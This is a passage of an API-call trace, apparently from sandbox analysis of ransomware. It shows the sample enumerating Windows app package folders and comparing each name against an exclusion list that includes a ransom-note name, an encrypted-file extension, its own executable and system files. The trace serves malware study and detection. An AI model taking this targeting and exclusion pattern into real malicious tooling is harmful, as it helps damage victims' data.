(lpString1="Microsoft.PPIProjection_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.864] lstrcmpiW (lpString1="Microsoft.PPIProjection_cw5n1h2txyewy", lpString2="ids.txt") returned 1 [0055.864] lstrcmpiW (lpString1="Microsoft.PPIProjection_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.864] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.PPIProjection_cw5n1h2txyewy" | out: lpString1="Microsoft.PPIProjection_cw5n1h2txyewy") returned="Microsoft.PPIProjection_cw5n1h2txyewy" [0055.864] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11cdc0 [0055.864] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x9a) returned 0x11a230 [0055.864] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11cdc8 | out: ListHead=0xf68b0, ListEntry=0x11cdc8) returned 0x11ce08 [0055.864] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2b585e2b, ftCreationTime.dwHighDateTime=0x1d32719, ftLastAccessTime.dwLowDateTime=0x8b121dc6, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x8b2eb9cf, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Services.Store.Engagement_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.ENG")) returned 1 [0055.864] lstrcmpiW (lpString1="Microsoft.Services.Store.Engagement_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.864] lstrcmpiW (lpString1="Microsoft.Services.Store.Engagement_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.865] lstrcmpiW (lpString1="Microsoft.Services.Store.Engagement_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.865] lstrcmpiW (lpString1="Microsoft.Services.Store.Engagement_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.865] lstrcmpiW (lpString1="Microsoft.Services.Store.Engagement_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.865] lstrcmpiW (lpString1="Microsoft.Services.Store.Engagement_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.865] lstrcmpiW (lpString1="Microsoft.Services.Store.Engagement_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.865] lstrcmpiW (lpString1="Microsoft.Services.Store.Engagement_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.865] lstrcmpiW (lpString1="Microsoft.Services.Store.Engagement_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.865] lstrcmpiW (lpString1="Microsoft.Services.Store.Engagement_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.865] lstrcmpiW (lpString1="Microsoft.Services.Store.Engagement_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.865] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.Services.Store.Engagement_8wekyb3d8bbwe" | out: lpString1="Microsoft.Services.Store.Engagement_8wekyb3d8bbwe") returned="Microsoft.Services.Store.Engagement_8wekyb3d8bbwe" [0055.865] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d060 [0055.865] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb2) returned 0x11d4f8 [0055.865] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d068 | out: ListHead=0xf68b0, ListEntry=0x11d068) returned 0x11cdc8 [0055.865] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3186030, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x88a3d6df, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x88e698d0, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.SkypeApp_kzf8qxf38zg5c", cAlternateFileName="MICROS~1.SKY")) returned 1 [0055.865] lstrcmpiW (lpString1="Microsoft.SkypeApp_kzf8qxf38zg5c", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.865] lstrcmpiW (lpString1="Microsoft.SkypeApp_kzf8qxf38zg5c", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.865] lstrcmpiW (lpString1="Microsoft.SkypeApp_kzf8qxf38zg5c", lpString2="Rabbit4444.exe") returned -1 [0055.865] lstrcmpiW (lpString1="Microsoft.SkypeApp_kzf8qxf38zg5c", lpString2=".") returned 1 [0055.865] lstrcmpiW (lpString1="Microsoft.SkypeApp_kzf8qxf38zg5c", lpString2="..") returned 1 [0055.865] lstrcmpiW (lpString1="Microsoft.SkypeApp_kzf8qxf38zg5c", lpString2="windows") returned -1 [0055.865] lstrcmpiW (lpString1="Microsoft.SkypeApp_kzf8qxf38zg5c", lpString2="bootmgr") returned 1 [0055.865] lstrcmpiW (lpString1="Microsoft.SkypeApp_kzf8qxf38zg5c", lpString2="pagefile.sys") returned -1 [0055.865] lstrcmpiW (lpString1="Microsoft.SkypeApp_kzf8qxf38zg5c", lpString2="boot") returned 1 [0055.865] lstrcmpiW (lpString1="Microsoft.SkypeApp_kzf8qxf38zg5c", lpString2="ids.txt") returned 1 [0055.865] lstrcmpiW (lpString1="Microsoft.SkypeApp_kzf8qxf38zg5c", lpString2="NTUSER.DAT") returned -1 [0055.865] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.SkypeApp_kzf8qxf38zg5c" | out: lpString1="Microsoft.SkypeApp_kzf8qxf38zg5c") returned="Microsoft.SkypeApp_kzf8qxf38zg5c" [0055.865] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11cea0 [0055.865] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x90) returned 0x11e8a0 [0055.865] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11cea8 | out: ListHead=0xf68b0, ListEntry=0x11cea8) returned 0x11d068 [0055.865] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd30f451d, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xd3166c27, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xd3166c27, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.StorePurchaseApp_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.STO")) returned 1 [0055.865] lstrcmpiW (lpString1="Microsoft.StorePurchaseApp_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.865] lstrcmpiW (lpString1="Microsoft.StorePurchaseApp_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.865] lstrcmpiW (lpString1="Microsoft.StorePurchaseApp_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.866] lstrcmpiW (lpString1="Microsoft.StorePurchaseApp_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.866] lstrcmpiW (lpString1="Microsoft.StorePurchaseApp_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.866] lstrcmpiW (lpString1="Microsoft.StorePurchaseApp_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.866] lstrcmpiW (lpString1="Microsoft.StorePurchaseApp_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.866] lstrcmpiW (lpString1="Microsoft.StorePurchaseApp_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.866] lstrcmpiW (lpString1="Microsoft.StorePurchaseApp_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.866] lstrcmpiW (lpString1="Microsoft.StorePurchaseApp_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.866] lstrcmpiW (lpString1="Microsoft.StorePurchaseApp_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.866] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.StorePurchaseApp_8wekyb3d8bbwe" | out: lpString1="Microsoft.StorePurchaseApp_8wekyb3d8bbwe") returned="Microsoft.StorePurchaseApp_8wekyb3d8bbwe" [0055.866] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11cd80 [0055.866] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xa0) returned 0x11d5b8 [0055.866] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11cd88 | out: ListHead=0xf68b0, ListEntry=0x11cd88) returned 0x11cea8 [0055.866] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe3433d3f, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x35ff46f7, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x35ff46f7, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.VCLibs.140.00_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.00_")) returned 1 [0055.866] lstrcmpiW (lpString1="Microsoft.VCLibs.140.00_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.866] lstrcmpiW (lpString1="Microsoft.VCLibs.140.00_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.866] lstrcmpiW (lpString1="Microsoft.VCLibs.140.00_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.866] lstrcmpiW (lpString1="Microsoft.VCLibs.140.00_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.866] lstrcmpiW (lpString1="Microsoft.VCLibs.140.00_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.866] lstrcmpiW (lpString1="Microsoft.VCLibs.140.00_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.866] lstrcmpiW (lpString1="Microsoft.VCLibs.140.00_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.867] lstrcmpiW (lpString1="Microsoft.VCLibs.140.00_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.867] lstrcmpiW (lpString1="Microsoft.VCLibs.140.00_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.867] lstrcmpiW (lpString1="Microsoft.VCLibs.140.00_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.867] lstrcmpiW (lpString1="Microsoft.VCLibs.140.00_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.867] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.VCLibs.140.00_8wekyb3d8bbwe" | out: lpString1="Microsoft.VCLibs.140.00_8wekyb3d8bbwe") returned="Microsoft.VCLibs.140.00_8wekyb3d8bbwe" [0055.867] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11cfa0 [0055.867] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x9a) returned 0x11d660 [0055.867] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11cfa8 | out: ListHead=0xf68b0, ListEntry=0x11cfa8) returned 0x11cd88 [0055.867] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6065f77, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xc66f4772, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xc66f4772, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Wallet_8wekyb3d8bbwe", cAlternateFileName="MICROS~1.WAL")) returned 1 [0055.867] lstrcmpiW (lpString1="Microsoft.Wallet_8wekyb3d8bbwe", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.867] lstrcmpiW (lpString1="Microsoft.Wallet_8wekyb3d8bbwe", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.867] lstrcmpiW (lpString1="Microsoft.Wallet_8wekyb3d8bbwe", lpString2="Rabbit4444.exe") returned -1 [0055.867] lstrcmpiW (lpString1="Microsoft.Wallet_8wekyb3d8bbwe", lpString2=".") returned 1 [0055.867] lstrcmpiW (lpString1="Microsoft.Wallet_8wekyb3d8bbwe", lpString2="..") returned 1 [0055.867] lstrcmpiW (lpString1="Microsoft.Wallet_8wekyb3d8bbwe", lpString2="windows") returned -1 [0055.867] lstrcmpiW (lpString1="Microsoft.Wallet_8wekyb3d8bbwe", lpString2="bootmgr") returned 1 [0055.867] lstrcmpiW (lpString1="Microsoft.Wallet_8wekyb3d8bbwe", lpString2="pagefile.sys") returned -1 [0055.867] lstrcmpiW (lpString1="Microsoft.Wallet_8wekyb3d8bbwe", lpString2="boot") returned 1 [0055.867] lstrcmpiW (lpString1="Microsoft.Wallet_8wekyb3d8bbwe", lpString2="ids.txt") returned 1 [0055.867] lstrcmpiW (lpString1="Microsoft.Wallet_8wekyb3d8bbwe", lpString2="NTUSER.DAT") returned -1 [0055.867] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.Wallet_8wekyb3d8bbwe" | out: lpString1="Microsoft.Wallet_8wekyb3d8bbwe") returned="Microsoft.Wallet_8wekyb3d8bbwe" [0055.867] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11cf00 [0055.867] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x8c) returned 0x11ed60 [0055.867] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11cf08 | out: ListHead=0xf68b0, ListEntry=0x11cf08) returned 0x11cfa8 [0055.867] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x771d0d50, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x77243451, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x77243451, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy", cAlternateFileName="MICROS~1.CHX")) returned 1 [0055.867] lstrcmpiW (lpString1="Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.867] lstrcmpiW (lpString1="Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.867] lstrcmpiW (lpString1="Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.867] lstrcmpiW (lpString1="Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy", lpString2=".") returned 1 [0055.867] lstrcmpiW (lpString1="Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy", lpString2="..") returned 1 [0055.867] lstrcmpiW (lpString1="Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.867] lstrcmpiW (lpString1="Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.867] lstrcmpiW (lpString1="Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.867] lstrcmpiW (lpString1="Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.868] lstrcmpiW (lpString1="Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy", lpString2="ids.txt") returned 1 [0055.868] lstrcmpiW (lpString1="Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.868] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy" | out: lpString1="Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy") returned="Microsoft.Windows.Apprep.ChxApp_cw5n1h2txyewy" [0055.868] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11cec0 [0055.868] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xaa) returned 0x11d708 [0055.868] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11cec8 | out: ListHead=0xf68b0, ListEntry=0x11cec8) returned 0x11cf08 [0055.868] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6bfb93d2, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0x7962cbd4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x7975de94, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy", cAlternateFileName="MICROS~1.ASS")) returned 1 [0055.868] lstrcmpiW (lpString1="Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.868] lstrcmpiW (lpString1="Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.868] lstrcmpiW (lpString1="Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.868] lstrcmpiW (lpString1="Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy", lpString2=".") returned 1 [0055.868] lstrcmpiW (lpString1="Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy", lpString2="..") returned 1 [0055.868] lstrcmpiW (lpString1="Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.868] lstrcmpiW (lpString1="Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.868] lstrcmpiW (lpString1="Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.868] lstrcmpiW (lpString1="Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.868] lstrcmpiW (lpString1="Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy", lpString2="ids.txt") returned 1 [0055.868] lstrcmpiW (lpString1="Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.868] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy" | out: lpString1="Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy") returned="Microsoft.Windows.AssignedAccessLockApp_cw5n1h2txyewy" [0055.868] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11ce20 [0055.868] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xba) returned 0x11d7c0 [0055.868] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11ce28 | out: ListHead=0xf68b0, ListEntry=0x11ce28) returned 0x11cec8 [0055.868] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x74ba56ed, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xd05a99ea, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xd05a99ea, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy", cAlternateFileName="MICROS~1.CLO")) returned 1 [0055.868] lstrcmpiW (lpString1="Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.868] lstrcmpiW (lpString1="Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.868] lstrcmpiW (lpString1="Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.868] lstrcmpiW (lpString1="Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy", lpString2=".") returned 1 [0055.868] lstrcmpiW (lpString1="Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy", lpString2="..") returned 1 [0055.868] lstrcmpiW (lpString1="Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.868] lstrcmpiW (lpString1="Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.868] lstrcmpiW (lpString1="Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.868] lstrcmpiW (lpString1="Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.868] lstrcmpiW (lpString1="Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy", lpString2="ids.txt") returned 1 [0055.868] lstrcmpiW (lpString1="Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.868] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy" | out: lpString1="Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy") returned="Microsoft.Windows.CloudExperienceHost_cw5n1h2txyewy" [0055.869] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d0c0 [0055.869] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xb6) returned 0x11d888 [0055.869] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d0c8 | out: ListHead=0xf68b0, ListEntry=0x11d0c8) returned 0x11ce28 [0055.869] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7659308d, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xddff7455, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xddff7455, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy", cAlternateFileName="MICROS~2.CON")) returned 1 [0055.869] lstrcmpiW (lpString1="Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.869] lstrcmpiW (lpString1="Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.869] lstrcmpiW (lpString1="Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.869] lstrcmpiW (lpString1="Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy", lpString2=".") returned 1 [0055.869] lstrcmpiW (lpString1="Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy", lpString2="..") returned 1 [0055.869] lstrcmpiW (lpString1="Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.869] lstrcmpiW (lpString1="Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.869] lstrcmpiW (lpString1="Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.869] lstrcmpiW (lpString1="Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.869] lstrcmpiW (lpString1="Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy", lpString2="ids.txt") returned 1 [0055.869] lstrcmpiW (lpString1="Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.869] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | out: lpString1="Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy") returned="Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" [0055.869] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11d040 [0055.869] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbc) returned 0x11d948 [0055.869] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11d048 | out: ListHead=0xf68b0, ListEntry=0x11d048) returned 0x11d0c8 [0055.869] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x814d4f06, ftCreationTime.dwHighDateTime=0x1d32714, ftLastAccessTime.dwLowDateTime=0xdade5d03, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0xdade5d03, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft.Windows.Cortana_cw5n1h2txyewy", cAlternateFileName="MICROS~1.COR")) returned 1 [0055.869] lstrcmpiW (lpString1="Microsoft.Windows.Cortana_cw5n1h2txyewy", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0055.869] lstrcmpiW (lpString1="Microsoft.Windows.Cortana_cw5n1h2txyewy", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0055.869] lstrcmpiW (lpString1="Microsoft.Windows.Cortana_cw5n1h2txyewy", lpString2="Rabbit4444.exe") returned -1 [0055.869] lstrcmpiW (lpString1="Microsoft.Windows.Cortana_cw5n1h2txyewy", lpString2=".") returned 1 [0055.869] lstrcmpiW (lpString1="Microsoft.Windows.Cortana_cw5n1h2txyewy", lpString2="..") returned 1 [0055.869] lstrcmpiW (lpString1="Microsoft.Windows.Cortana_cw5n1h2txyewy", lpString2="windows") returned -1 [0055.869] lstrcmpiW (lpString1="Microsoft.Windows.Cortana_cw5n1h2txyewy", lpString2="bootmgr") returned 1 [0055.869] lstrcmpiW (lpString1="Microsoft.Windows.Cortana_cw5n1h2txyewy", lpString2="pagefile.sys") returned -1 [0055.869] lstrcmpiW (lpString1="Microsoft.Windows.Cortana_cw5n1h2txyewy", lpString2="boot") returned 1 [0055.869] lstrcmpiW (lpString1="Microsoft.Windows.Cortana_cw5n1h2txyewy", lpString2="ids.txt") returned 1 [0055.869] lstrcmpiW (lpString1="Microsoft.Windows.Cortana_cw5n1h2txyewy", lpString2="NTUSER.DAT") returned -1 [0055.869] lstrcpyW (in: lpString1=0x130eb86, lpString2="Microsoft.Windows.Cortana_cw5n1h2txyewy" | out: lpString1="Microsoft.Windows.Cortana_cw5n1h2txyewy") returned="Microsoft.Windows.Cortana_cw5n1h2txyewy" [0055.869] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x11cde0 [0055.869] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x9e) returned 0x11da10 [0055.869] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x11cde8 | out: ListHead=0xf68b0, ListEntry=0x11cde8) returned 0x11d048 [0055.869] FindNextFileW (in: hFindFile=0x102a10, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x75dff3f8, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x75e71ae4, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x75e71ae4, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, 